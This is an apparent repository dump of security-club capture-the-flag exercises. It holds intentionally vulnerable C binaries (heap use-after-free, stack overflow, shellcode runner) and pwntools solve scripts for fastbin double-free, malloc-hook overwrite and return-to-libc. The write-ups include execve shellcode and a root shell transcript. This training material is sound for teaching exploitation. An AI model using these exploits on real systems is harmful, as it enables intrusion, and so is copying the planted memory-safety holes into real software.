gWrite(); 86 | break; 87 | case 3: 88 | gClear(); 89 | break; 90 | case 0x1337: 91 | once(); 92 | break; 93 | default: 94 | puts("[-] Invalid choice"); 95 | break; 96 | } 97 | } 98 | return 0; 99 | } 100 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/fastbin/flag.txt: -------------------------------------------------------------------------------- 1 | Aegis{Can_you_Exploit_fastbin_in_arena?} 2 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/fastbin/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process(["./fb"]) 4 | 5 | context.binary = "./fb" 6 | context.log_level = "INFO" 7 | 8 | def alloc(data): 9 | p.sendlineafter("> ", "1") 10 | p.sendafter("> ", data) 11 | 12 | def show(idx): 13 | p.sendlineafter("> ", "2") 14 | p.sendlineafter("> ", str(idx)) 15 | 16 | def delete(idx): 17 | p.sendlineafter("> ", "3") 18 | p.sendlineafter("> ", str(idx)) 19 | 20 | p.recvuntil("Delete") 21 | alloc(p64(0x51) * 8) 22 | alloc(p64(0x51) * 8) 23 | alloc(p64(0x51) * 8) 24 | alloc(p64(0x51) * 8) 25 | alloc(p64(0x51) * 8) 26 | alloc(p64(0x51) * 8) 27 | alloc(p64(0x51) * 8) 28 | alloc(p64(0x51) * 8) 29 | alloc(p64(0x51) * 8) 30 | alloc(p64(0x51) * 8) 31 | delete(1) 32 | delete(0) 33 | show(0) 34 | 35 | p.recvuntil("> ") 36 | leak = u64(p.recv(6) + "\x00\x00") 37 | heap_base = leak - 0x50 38 | 39 | log.info("heap base : " + hex(heap_base)) 40 | 41 | delete(1) # fastbin double free ! 42 | alloc(p64(heap_base + 0x90)) # corrupt fastbin's fd 43 | alloc("ddaa") 44 | alloc("ddaa") 45 | alloc(p64(0) + p64(0x91)) # size overwrite 46 | 47 | delete(2) # unsorted bin leak 48 | show(2) # leak ! 49 | p.recvuntil("> ") 50 | libc = u64(p.recv(6) + "\x00\x00") 51 | libc_base = libc - 0x3c4b78 52 | system = libc_base + 0x45390 53 | _IO_list_all = libc_base + 0x3c5520 54 | 55 | log.info("libc leak : " + hex(libc)) 56 | log.info("libc_base : " + hex(libc_base)) 57 | 58 | delete(0) 59 | delete(1) 60 | delete(0) 61 | 62 | nheap = heap_base + 0xa0 63 | #exp = "/bin/sh\x00" + p64(0x61) 64 | exp = p64(0xdeadbeef) + p64(_IO_list_all - 0x10) 65 | exp += p64(2) + p64(3) + p64(0) * 8 66 | exp += p64(0) + p64(system) 67 | exp += p64(0) * 4 68 | exp += p64(nheap + 0x90) + p64(3) + p64(4) + p64(0) + p64(2) + p64(0) * 2 69 | exp += p64(nheap + 0x60) # vtable 70 | 71 | 72 | alloc(p64(heap_base + 0x90)) 73 | alloc("ddaa") 74 | alloc("ddaa") 75 | payload = "/bin/sh\x00" + p64(0xb1) 76 | alloc(payload) 77 | 78 | p.sendlineafter("> ", "4919") 79 | p.sendlineafter("> ", "2") 80 | p.sendafter("> ", exp) 81 | 82 | p.sendlineafter("> ", "1") 83 | 84 | p.interactive() 85 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/banner.txt: -------------------------------------------------------------------------------- 1 | _ _ ______ _____ 2 | | | | | ____| /\ | __ \ 3 | | |__| | |__ / \ | |__) | 4 | | __ | __| / /\ \ | ___/ 5 | | | | | |____ / ____ \| | 6 | |_| |_|______/_/ \_\_| 7 | 8 | 9 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/flag.txt: -------------------------------------------------------------------------------- 1 | flag{h0w_to_l3ad_f4stb1n_4ttack} 2 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/aegispwnable/heap/heap -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/heap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void *chunk_array[0x10]; 8 | 9 | void initialize(){ 10 | char buf; 11 | setvbuf(stdin, 0, 2, 0); 12 | setvbuf(stdout, 0, 2, 0); 13 | setvbuf(stderr, 0, 2, 0); 14 | int fd = open("./banner.txt", O_RDONLY); 15 | if( fd < 0 ){ exit(-1); } 16 | while( read(fd, &buf, 1) ) 17 | write(1, &buf, 1); 18 | close(fd); 19 | } 20 | 21 | void menu(){ 22 | puts("1. Read"); 23 | puts("2. Write"); 24 | puts("3. Edit"); 25 | write(1, "> ", 2); 26 | } 27 | 28 | void gRead(){ 29 | int size, i; 30 | write(1, "> ", 2); 31 | scanf("%d", &size); 32 | for(i = 0; chunk_array[i]; i++){} 33 | switch(size){ 34 | case 1: 35 | chunk_array[i] = malloc(0x68); 36 | read(0, chunk_array[i], 0x68); 37 | break; 38 | case 2: 39 | chunk_array[i] = malloc(0x88); 40 | read(0, chunk_array[i], 0x88); 41 | break; 42 | case 3: 43 | chunk_array[i] = malloc(0x228); 44 | read(0, chunk_array[i], 0x228); 45 | break; 46 | default: 47 | puts("[-] Invalid size"); 48 | break; 49 | } 50 | } 51 | void gWrite(){ 52 | int index; 53 | write(1, "> ", 2); 54 | scanf("%d", &index); 55 | if( chunk_array[index] && index >= 0 && index <= 15 ){ 56 | write(1, "> ", 2); 57 | write(1, chunk_array[index], strlen(chunk_array[index])); 58 | } 59 | else{ 60 | puts("[-] Invalid index"); 61 | } 62 | } 63 | void gEdit(){ 64 | int index; 65 | write(1, "> ", 2); 66 | scanf("%d", &index); 67 | if( chunk_array[index] && index >= 0 && index <= 15 ){ 68 | write(1, "> ", 2); 69 | read(0, chunk_array[index], strlen(chunk_array[index])); 70 | } 71 | else{ 72 | puts("[-] Invalid index"); 73 | } 74 | } 75 | void gClear(){ 76 | int i; 77 | write(1, "> ", 2); 78 | scanf("%d", &i); 79 | if( chunk_array[i] && i >= 0 && i <= 15 ){ 80 | free(chunk_array[i]); 81 | chunk_array[i] = 0; 82 | } 83 | } 84 | 85 | int main(int argc, char *argv[]){ 86 | int choice; 87 | initialize(); 88 | while(1){ 89 | menu(); 90 | scanf("%d", &choice); 91 | switch(choice){ 92 | case 1: 93 | gRead(); 94 | break; 95 | case 2: 96 | gWrite(); 97 | break; 98 | case 3: 99 | gEdit(); 100 | break; 101 | case 0x1337: 102 | gClear(); 103 | break; 104 | default: 105 | puts("[-] Invalid choice"); 106 | break; 107 | } 108 | } 109 | return 0; 110 | } 111 | -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/aegispwnable/heap/libc-2.23.so -------------------------------------------------------------------------------- /aegis/pwnable/aegispwnable/heap/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process(["./heap"]) 4 | binary = ELF("./heap") 5 | 6 | def gAlloc(idx, data): 7 | p.sendlineafter("> ", "1") 8 | p.sendlineafter("> ", str(idx)) 9 | p.send(data) 10 | 11 | def gWrite(idx): 12 | p.sendlineafter("> ", "2") 13 | p.sendlineafter("> ", str(idx)) 14 | 15 | def gEdit(idx, data): 16 | p.sendlineafter("> ", "3") 17 | p.sendlineafter("> ", str(idx)) 18 | p.sendafter("> ", data) 19 | 20 | def gFree(idx): 21 | p.sendlineafter("> ", str(0x1337)) 22 | p.sendlineafter("> ", str(idx)) 23 | 24 | gAlloc(1, "A" * 0x68) 25 | gAlloc(2, "B" * 0x68) 26 | gAlloc(2, "C" * 0x88) 27 | gFree(0) 28 | gFree(2) 29 | gFree(1) 30 | gAlloc(1, "A" * 0x8) 31 | gWrite(0) 32 | p.recvuntil("A" * 8) 33 | leak = u64(p.recv(6).ljust(8, "\x00")) 34 | libc_base = leak - 0x3c4b78 35 | hook = libc_base + 0x3c4aed 36 | log.info("leak : " + hex(leak)) 37 | 38 | gAlloc(1, "b" * 0x68) # 1 39 | gAlloc(1, p64(0x71) * 13) # 2 40 | gAlloc(1, p64(0x71) * 13) # 3 41 | gAlloc(1, p64(0x71) * 13) # 4 42 | gAlloc(1, p64(0x71) * 13) # 5 43 | 44 | gEdit(1, "b" * 0x68 + "\xe1") 45 | gFree(2) 46 | gAlloc(1, "c" * 0x68) 47 | gAlloc(1, "d" * 0x68) 48 | 49 | # 3, 6 50 | 51 | gFree(3) 52 | gFree(2) 53 | gFree(6) 54 | 55 | gAlloc(1, p64(hook) + "c" * 0x60) 56 | gAlloc(1, p64(0xc0d3c0d3) + "d" * 0x60) 57 | gAlloc(1, p64(0xc0d3c0d3) + "e" * 0x60) 58 | 59 | gAlloc(1, "A" * 0x13 + p64(libc_base + 0xf1147)) 60 | p.sendlineafter("> ", "1") 61 | p.sendlineafter("> ", "1") 62 | 63 | p.interactive() 64 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge1/flag: -------------------------------------------------------------------------------- 1 | GDB_1s_most_p0w3rful_to0l_in_the_world!! 2 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge1/setmagic: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/challenge1/setmagic -------------------------------------------------------------------------------- /aegis/pwnable/challenge1/setmagic.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void auth(){ 7 | unsigned char key[] = "M4k1ng_A3gis_t0p_security_Research_Group"; 8 | unsigned char cipher[] = {10, 112, 41, 110, 95, 20, 0, 44, 92, 20, 29, 44, 47, 68, 71, 67, 45, 21, 16, 15, 42, 6, 6, 68, 21, 0, 59, 11, 44, 17, 9, 23, 60, 31, 48, 53, 30, 11, 84, 81}; 9 | int fd = open("/dev/urandom", O_RDONLY); 10 | if( fd < 0 ){ 11 | perror("open"); 12 | exit(-1); 13 | } 14 | unsigned int password, secret; 15 | read(fd, &secret, 4); 16 | scanf("%u", &password); 17 | 18 | if( password == secret ){ 19 | for( int i = 0; i < 40; i++ ){ 20 | printf("%c", cipher[i] ^ key[i]); 21 | } 22 | } 23 | 24 | else{ 25 | printf("Wrong !\n"); 26 | exit(-1); 27 | } 28 | } 29 | 30 | int main(int argc, char *argv[]){ 31 | setvbuf(stdin, 0, 2, 0); 32 | setvbuf(stdout, 0, 2, 0); 33 | setvbuf(stderr, 0, 2, 0); 34 | printf("Simple pwn challenge 1\n"); 35 | auth(); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge1/write-up.md: -------------------------------------------------------------------------------- 1 | # Pwnable Challenge 1 Write-up 2 | **Just use GDB** 3 | - `set` command is powerful gdb command to modify `memory value` and `register value`. 4 | - We can't find `/dev/urandom/` value, so normally bypassing the `if` statement is impossible. 5 | - But, in GDB, we can use `set` command. 6 | - Just set breakpoint in `cmp` instruction, and modify target registers. 7 | ``` 8 | => 0x40094b : cmp edx,eax 9 | ``` 10 | - `set $rdx=0` and `set $rax=0` -> rax == rdx ( eax == edx ) 11 | ``` 12 | exploit-peda$ set $rdx=0 13 | exploit-peda$ set $rax=0 14 | exploit-peda$ c 15 | Continuing. 16 | GDB_1s_most_p0w3rful_to0l_in_the_world!![Inferior 1 (process 4937) exited normally] 17 | ``` 18 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge2/README.md: -------------------------------------------------------------------------------- 1 | # Aegis pwnable challenge 2 | **challenge 2** 3 | - Simple shellcode challenge 4 | - Read the given source code, and exploit the binary in your local ubuntu machine. 5 | - If you solve it, upload your write-up on Aegis web page. 6 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge2/challenge2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/challenge2/challenge2 -------------------------------------------------------------------------------- /aegis/pwnable/challenge2/challenge2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int main(int argc, char *argv[]){ 8 | unsigned char buf[0x100] = {0, }; 9 | setvbuf(stdin, 0, 2, 0); 10 | setvbuf(stdout, 0, 2, 0); 11 | printf("This is Simple 64bit pwnable challenge !\n"); 12 | printf("Just generate 64bit shellcode !\n"); 13 | void *rwx_page = mmap(0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 14 | read(0, buf, 0x100); 15 | for(int i = 0; i < 0x100; i++){ 16 | buf[i] = buf[i] ^ (rand() & 0xff); 17 | } 18 | memcpy(rwx_page, (void *)buf, 0x100); 19 | ((void (*)())rwx_page)(); 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge2/flag: -------------------------------------------------------------------------------- 1 | Aegis{B4sic_Sh3l1cod3} 2 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge2/write-up.md: -------------------------------------------------------------------------------- 1 | # Pwnable Challenge 1 Write-up 2 | **xor bit calculation + shellcode** 3 | - `rand()` function is little bit tricky. 4 | - If `srand()` doesn't exist, `rand()` values are static value. 5 | ``` 6 | root@9eb26f7bbdb1:/shared/aegis/reversing/challenge1# ./a.out 7 | 103 8 | 198 9 | 105 10 | 115 11 | 81 12 | 255 13 | 74 14 | 236 15 | 41 16 | 205 17 | 186 18 | 171 19 | 242 20 | 251 21 | 227 22 | 70 23 | 124 24 | 194 25 | 84 26 | 248 27 | 27 28 | 232 29 | 231 30 | 141 31 | 118 32 | 90 33 | 46 34 | root@9eb26f7bbdb1:/shared/aegis/reversing/challenge1# ./a.out 35 | 103 36 | 198 37 | 105 38 | 115 39 | 81 40 | 255 41 | 74 42 | 236 43 | 41 44 | 205 45 | 186 46 | 171 47 | 242 48 | 251 49 | 227 50 | 70 51 | 124 52 | 194 53 | 84 54 | 248 55 | 27 56 | 232 57 | 231 58 | 141 59 | 118 60 | 90 61 | 46 62 | ``` 63 | - Same values are returned. 64 | - So, with this, we can calculate what values are needed for making shellcode. 65 | - I use this one `6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05` 66 | ``` 67 | root@9eb26f7bbdb1:/shared/aegis/pwnable/challenge2# python solve.py 68 | [+] Starting local process './challenge2': pid 5058 69 | [*] '/shared/aegis/pwnable/challenge2/challenge2' 70 | Arch: amd64-64-little 71 | RELRO: Full RELRO 72 | Stack: Canary found 73 | NX: NX enabled 74 | PIE: No PIE (0x400000) 75 | 6a6848b82f62696e2f2f2f73504889e768726901018134240101010131f6566a085e4801e6564889e631d26a3b580f05 76 | [*] Switching to interactive mode 77 | This is Simple 64bit pwnable challenge ! 78 | Just generate 64bit shellcode ! 79 | $ ls 80 | challenge2 challenge2.c solve.py 81 | $ id 82 | uid=0(root) gid=0(root) groups=0(root) 83 | $ 84 | ``` 85 | - Solve.py 86 | ``` 87 | from pwn import * 88 | import ctypes 89 | 90 | LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6') 91 | 92 | p = process(["./challenge2"]) 93 | context.binary = "./challenge2" 94 | sc = asm(shellcraft.sh()) 95 | 96 | xor_sc = '' 97 | 98 | print sc.encode("hex") 99 | 100 | for i in xrange(len(sc)): 101 | xor_sc += chr(ord(sc[i]) ^ (LIBC.rand() & 0xff)) 102 | p.sendline(xor_sc) 103 | p.interactive() 104 | ``` 105 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge3/README.md: -------------------------------------------------------------------------------- 1 | # Pwnable Challenge 3 2 | **Description about RTL( Return to Libc Exploitation )** 3 | - RTL is useful when `NX` mitigation is on and can't execute shellcode directly. 4 | - RTL means using library to bypass above mitigation. 5 | - Need to library address to get another library function. 6 | - System load `shared object file == shared library` on runtime. 7 | ``` 8 | exploit-peda$ vmmap 9 | Start End Perm Name 10 | 0x08048000 0x08049000 r-xp /shared/aegis/pwnable/challenge3/prertl 11 | 0x08049000 0x0804a000 r--p /shared/aegis/pwnable/challenge3/prertl 12 | 0x0804a000 0x0804b000 rw-p /shared/aegis/pwnable/challenge3/prertl 13 | 0xf7e09000 0xf7e0a000 rw-p mapped 14 | 0xf7e0a000 0xf7fba000 r-xp /lib/i386-linux-gnu/libc-2.23.so 15 | 0xf7fba000 0xf7fbc000 r--p /lib/i386-linux-gnu/libc-2.23.so 16 | 0xf7fbc000 0xf7fbd000 rw-p /lib/i386-linux-gnu/libc-2.23.so 17 | 0xf7fbd000 0xf7fc0000 rw-p mapped 18 | 0xf7fc0000 0xf7fc3000 r-xp /lib/i386-linux-gnu/libdl-2.23.so 19 | 0xf7fc3000 0xf7fc4000 r--p /lib/i386-linux-gnu/libdl-2.23.so 20 | 0xf7fc4000 0xf7fc5000 rw-p /lib/i386-linux-gnu/libdl-2.23.so 21 | 0xf7fd4000 0xf7fd6000 rw-p mapped 22 | 0xf7fd6000 0xf7fd8000 r--p [vvar] 23 | 0xf7fd8000 0xf7fd9000 r-xp [vdso] 24 | 0xf7fd9000 0xf7ffb000 r-xp /lib/i386-linux-gnu/ld-2.23.so 25 | 0xf7ffb000 0xf7ffc000 rw-p mapped 26 | 0xf7ffc000 0xf7ffd000 r--p /lib/i386-linux-gnu/ld-2.23.so 27 | 0xf7ffd000 0xf7ffe000 rw-p /lib/i386-linux-gnu/ld-2.23.so 28 | 0xfffdd000 0xffffe000 rw-p [stack] 29 | ``` 30 | - libc-2.23.so and libdl-2.23.so are libraries. 31 | - Library has so many functions that are good for exploitation. 32 | ``` 33 | root@9eb26f7bbdb1:/shared/aegis/pwnable/challenge3# gdb /lib/i386-linux-gnu/libc-2.23.so 34 | Reading symbols from /lib/i386-linux-gnu/libc-2.23.so...(no debugging symbols found)...done. 35 | exploit-peda$ p system 36 | $1 = {} 0x3ada0 37 | exploit-peda$ p printf 38 | $2 = {} 0x49670 39 | exploit-peda$ p open 40 | $3 = {} 0xd56e0 41 | exploit-peda$ p close 42 | $4 = {} 0xd6280 43 | exploit-peda$ p rand 44 | $5 = {} 0x2f900 45 | ``` 46 | - If binary hasn't `system` function, it doesn't matter if we have library address. 47 | - We can call `system` in library. 48 | - At first, we need to know about `libc_base` and `offset` definitions. 49 | - `libc_base` means `0xf7e0a000 0xf7fba000 r-xp /lib/i386-linux-gnu/libc-2.23.so` -> 0xf7e0a000 50 | - Literally meaning `library base address == Bottom of library address ( loaded library in memory )` 51 | - `offset` means `function address - library_base address` 52 | - For example, see the following one. 53 | ``` 54 | exploit-peda$ p system 55 | $1 = {} 0xf7e44da0 56 | exploit-peda$ vmmap 57 | Start End Perm Name 58 | 0x08048000 0x08049000 r-xp /shared/aegis/pwnable/challenge3/prertl 59 | 0x08049000 0x0804a000 r--p /shared/aegis/pwnable/challenge3/prertl 60 | 0x0804a000 0x0804b000 rw-p /shared/aegis/pwnable/challenge3/prertl 61 | 0xf7e09000 0xf7e0a000 rw-p mapped 62 | 0xf7e0a000 0xf7fba000 r-xp /lib/i386-linux-gnu/libc-2.23.so 63 | 0xf7fba000 0xf7fbc000 r--p /lib/i386-linux-gnu/libc-2.23.so 64 | 0xf7fbc000 0xf7fbd000 rw-p /lib/i386-linux-gnu/libc-2.23.so 65 | exploit-peda$ p 0xf7e44da0 - 0xf7e0a000 66 | $2 = 0x3ada0 67 | ``` 68 | - `offset` is `0x3ada0` 69 | - Another method is analyzing library directly. 70 | - Library ( libc.so.6 ) is compiled with `-fPIC -shared` options. 71 | - So, before loaded in memory, library has just offset to each function. 72 | ``` 73 | root@9eb26f7bbdb1:/shared/aegis/pwnable/challenge3# gdb /lib/i386-linux-gnu/libc-2.23.so 74 | Reading symbols from /lib/i386-linux-gnu/libc-2.23.so...(no debugging symbols found)...done. 75 | exploit-peda$ p system 76 | $1 = {} 0x3ada0 77 | ``` 78 | - Use this `offset` and add to `library base` 79 | 80 | **Exploitation** 81 | - x86 follow std calling convention which set arguments in stack. 82 | - If i call `read(0, buf, 0x100);`, disassemble results are following one. 83 | ``` 84 | 0x080486c9 <+138>: push 0x100 85 | 0x080486ce <+143>: lea eax,[ebp-0x10c] 86 | 0x080486d4 <+149>: push eax 87 | 0x080486d5 <+150>: push 0x0 88 | 0x080486d7 <+152>: call 0x8048490 89 | ``` 90 | - `push 0x100` -> first argument, `push eax ( which is equal to [ebp - 0x10c] )` -> second argument, `push 0x0` -> third argument. 91 | - And call `read` function. 92 | - `call` instruction is abstract instruction, which is equal to `push [next $pc] + jmp [target address]` 93 | - So, we need to overwrite stack return address with this chain. 94 | ``` 95 | | return address | ... 96 | | system address | dummy | "/bin/sh" address | ... 97 | ``` 98 | - Because in library functions, they reference arguments like following one. 99 | ``` 100 | exploit-peda$ pd read 101 | Dump of assembler code for function read: 102 | 0x000d5af0 <+0>: cmp DWORD PTR gs:0xc,0x0 103 | 0x000d5af8 <+8>: jne 0xd5b20 104 | 0x000d5afa <+10>: push ebx 105 | 0x000d5afb <+11>: mov edx,DWORD PTR [esp+0x10] 106 | 0x000d5aff <+15>: mov ecx,DWORD PTR [esp+0xc] 107 | 0x000d5b03 <+19>: mov ebx,DWORD PTR [esp+0x8] 108 | 0x000d5b07 <+23>: mov eax,0x3 109 | 0x000d5b0c <+28>: call DWORD PTR gs:0x10 110 | ``` 111 | - `read` is system call wrapper, so it set registers with arguments before calling `int 0x80( DWORD PTR gs:0x10 )`. 112 | - `ebx` is first arg, `ecx` is second and `edx` is last one. 113 | - They get arguments from stack, which places are same as above description. 114 | - We do just return to shellcode address, which overwrite stack address once. 115 | - This is just overwrite return address with `arbitrary function address` and set `argument(s)` about this function. 116 | - Next exploitation upgraded version of RTL is ROP ( Return Oriented Programming ) which is similar to RTL, but use so called `gadgets`. 117 | - Enjoy your exploit ! 118 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge3/flag: -------------------------------------------------------------------------------- 1 | Aegis{R3turn_t0_L1br4ry} 2 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge3/prertl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/pwnable/challenge3/prertl -------------------------------------------------------------------------------- /aegis/pwnable/challenge3/prertl.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | void vuln(char *_buf){ 8 | char msg[100]; 9 | memcpy(msg, _buf, 0x100); 10 | printf("msg : %s\n", msg); 11 | } 12 | 13 | int main(int argc, char *argv[]){ 14 | unsigned long address; 15 | char buf[0x100]; 16 | setvbuf(stdin, 0, 2, 0); 17 | setvbuf(stdout, 0, 2, 0); 18 | printf("Simple Retun-To-Libc Challenge\n"); 19 | void *handle = dlopen("libc.so.6", RTLD_LAZY); 20 | printf("Library base address ( libc_base ) : %#lx\n", *(unsigned long *)handle); 21 | printf("Leave message"); 22 | read(0, buf, 0x100); 23 | vuln(buf); 24 | return 0; 25 | } 26 | -------------------------------------------------------------------------------- /aegis/pwnable/challenge3/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | p = process(["./prertl"]) 3 | p.recvuntil("Library base address ( libc_base ) : ") 4 | libc_base = int(p.recvuntil("\n")[:-1], 0) 5 | system = libc_base + 0x3ada0 6 | binsh = libc_base + 0x15b9ab 7 | p.sendline("A" * 0x6c + "B" * 4 + p32(system) + p32(0xdeadbeef) + p32(binsh)) 8 | p.interactive() 9 | -------------------------------------------------------------------------------- /aegis/reversing/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | 3 | **Good luck !** 4 | -------------------------------------------------------------------------------- /aegis/reversing/challenge1/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | 3 | **Challenge 1** 4 | 5 | - Find simple xor key value 6 | - Main part of code 7 | 8 | ``` 9 | #include 10 | #include 11 | #include 12 | 13 | unsigned char cipher[27]; 14 | 15 | char *encrypt(char *plain, int len){ 16 | unsigned char xor_key; 17 | for( int i = 0; i < len; i++ ){ 18 | xor_key = rand() & 0xff; 19 | cipher[i] = plain[i] ^ xor_key; 20 | } 21 | return (char *)cipher; 22 | } 23 | 24 | int main(int argc, char *argv[]){ 25 | printf("Reversing Challenge 1\n"); 26 | unsigned char plain_text[] = "---------------------------"; 27 | unsigned char *cipher = encrypt(plain_text, 27); 28 | return 0; 29 | } 30 | ``` 31 | 32 | - Download only `reversing_challenge1` file on the top. 33 | - Upload your write-up on Aegis Webpage. 34 | -------------------------------------------------------------------------------- /aegis/reversing/challenge1/decryption.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | unsigned char cipher[] = {0x14, 0xf7, 0x4, 0x3, 0x3d, 0x9a, 0x6a, 0x9e, 0x1a, 0xbb, 0xdf, 0xd9, 0x81, 0x92, 0x8d, 0x21, 0x5c, 0xa1, 0x3c, 0xcc, 0x77, 0x84, 0x82, 0xe3, 0x11, 0x3f, 0xf}; 6 | unsigned char decrypt[27]; 7 | 8 | void decryption(unsigned int *key){ 9 | for( int i = 0; i < 27; i++ ){ 10 | decrypt[i] = cipher[i] ^ (key[i] & 0xff); 11 | } 12 | } 13 | 14 | void auth(){ 15 | printf("Flag : [%s]\n", decrypt); 16 | } 17 | 18 | int main(int argc, char *argv[]){ 19 | unsigned int key[27]; 20 | int i; 21 | printf("[+] Challenge 1\n"); 22 | printf("Input your key value\n"); 23 | for( i = 0; i < 27; i++ ){ 24 | scanf("%u", &key[i]); 25 | } 26 | 27 | decryption(key); 28 | auth(); 29 | return 0; 30 | } 31 | -------------------------------------------------------------------------------- /aegis/reversing/challenge1/encryption.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | unsigned char cipher[27]; 6 | 7 | char *encrypt(char *plain, int len){ 8 | unsigned char xor_key; 9 | for( int i = 0; i < len; i++ ){ 10 | xor_key = rand() & 0xff; 11 | cipher[i] = plain[i] ^ xor_key; 12 | } 13 | return (char *)cipher; 14 | } 15 | 16 | int main(int argc, char *argv[]){ 17 | printf("Reversing Challenge 1\n"); 18 | //unsigned char plain_text[] = "s1mple r3versing ch4llenge!"; 19 | unsigned char plain_text[] = "---------------------------"; 20 | unsigned char *cipher = encrypt(plain_text, 27); 21 | 22 | for(int i = 0; i < 27; i++){ 23 | printf("%#x, ", cipher[i]); 24 | } 25 | 26 | printf("\n"); 27 | for(int i = 0; i < 27; i++){ 28 | printf("%#x, ", plain_text[i]); 29 | } 30 | printf("\n"); 31 | return 0; 32 | } 33 | -------------------------------------------------------------------------------- /aegis/reversing/challenge1/reversing_challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/reversing/challenge1/reversing_challenge1 -------------------------------------------------------------------------------- /aegis/reversing/challenge2/README.md: -------------------------------------------------------------------------------- 1 | # Aegis reversing challenge 2 | 3 | **Challenge 2** 4 | 5 | - Simple anti-debug challenge. 6 | - Search how linux binary is executed. 7 | - `__attribute__((constructor))` in gcc? 8 | - At first, download only binary file. 9 | - If you can't solve it, and then view source code. 10 | -------------------------------------------------------------------------------- /aegis/reversing/challenge2/challenge2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vngkv123/exploitation/444a67fcf84702d33fc7bffffab135a3caf40375/aegis/reversing/challenge2/challenge2 -------------------------------------------------------------------------------- /aegis/reversing/challenge2/challenge2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | char data[] = "\x68\x64\x20\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\xb8\x5f\x63\x30\x6d\x70\x6c\x65\x74\x50\x48\xb8\x34\x6c\x6c\x65\x6e\x67\x65\x32\x50\x48\xb8\x41\x33\x67\x69\x73\x5f\x63\x68\x50\x48\xc7\xc7\x00\x00\x00\x00\x48\x89\xe6\x48\xc7\xc2\x1a\x00\x00\x00\x48\xc7\xc0\x01\x00\x00\x00\x0f\x05"; 10 | 11 | void __attribute__((constructor)) detection(void){ 12 | if( ptrace(PTRACE_TRACEME, 0, 1, 0) == -1 ){ 13 | printf("Debugging Detect\n"); 14 | exit(-1); 15 | } 16 | } 17 | 18 | void verify(char *argv[]){ 19 | void *page; 20 | printf("Do you know how to input non-alphabet value?\n"); 21 | if( strncmp("\xef\xbe\xad\xde", argv[1], 4) == 0){ 22 | page = mmap(0, 0x1000, PROT_EXEC | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1 , 0); 23 | if( page < 0 ){ 24 | perror("mmap"); 25 | exit(-1); 26 | } 27 | memcpy(page, data, sizeof(data)); 28 | ((void (*)())page)(); 29 | } 30 | else{ 31 | printf("Wrong!\n"); 32 | exit(-1); 33 | } 34 | } 35 | 36 | int main(int argc, char *argv[]){ 37 | if( argc != 2 ){ 38 | printf("Usage : %s [key]\n", argv[0]); 39 | return 0; 40 | } 41 | verify(argv); 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /aegis/reversing/challenge2/write-up.md: -------------------------------------------------------------------------------- 1 | # Challenge 2 Write-up 2 | **GDB** 3 | ``` 4 | gef➤ r 5 | Starting program: /shared/aegis/reversing/challenge2/challenge2 6 | Debugging Detect 7 | [Inferior 1 (process 4876) exited with code 0377] 8 | ``` 9 | - 일반적으로 gdb를 열어서 디버깅을 할려고하면, 위와 같이 Debugging Detect를 보내면서 죽게된다. 10 | - Linux에서는 디버깅탐지를 일반적으로 ptrace()라는 함수를 이용해서 진행한다. 11 | - ptrace()함수에는 TRACEME라는 옵션을 줄 수가 있고, 각 프로세스에는 하나의 디버거만 붙을 수 있다. ( ptrace()의 내부 구현이 그렇게 